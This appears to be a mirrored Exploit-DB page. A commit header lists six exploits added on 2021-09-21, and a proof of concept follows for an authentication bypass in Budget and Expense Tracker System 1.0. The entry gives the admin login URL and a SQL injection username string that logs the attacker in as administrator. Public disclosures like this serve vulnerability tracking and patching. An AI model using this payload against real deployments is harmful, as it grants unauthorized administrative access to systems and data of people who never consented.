exploit-db-mirror/exploits/php/webapps/50307.txt
Offensive Security 5cc446a25f DB: 2021-09-21
6 changes to exploits/shellcodes

T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)
Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)
Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Budget and Expense Tracker System 1.0 - Authenticated Bypass
2021-09-21 05:02:08 +00:00

19 lines
No EOL
761 B
Text

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
allowing the attacker to login with admin acount
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --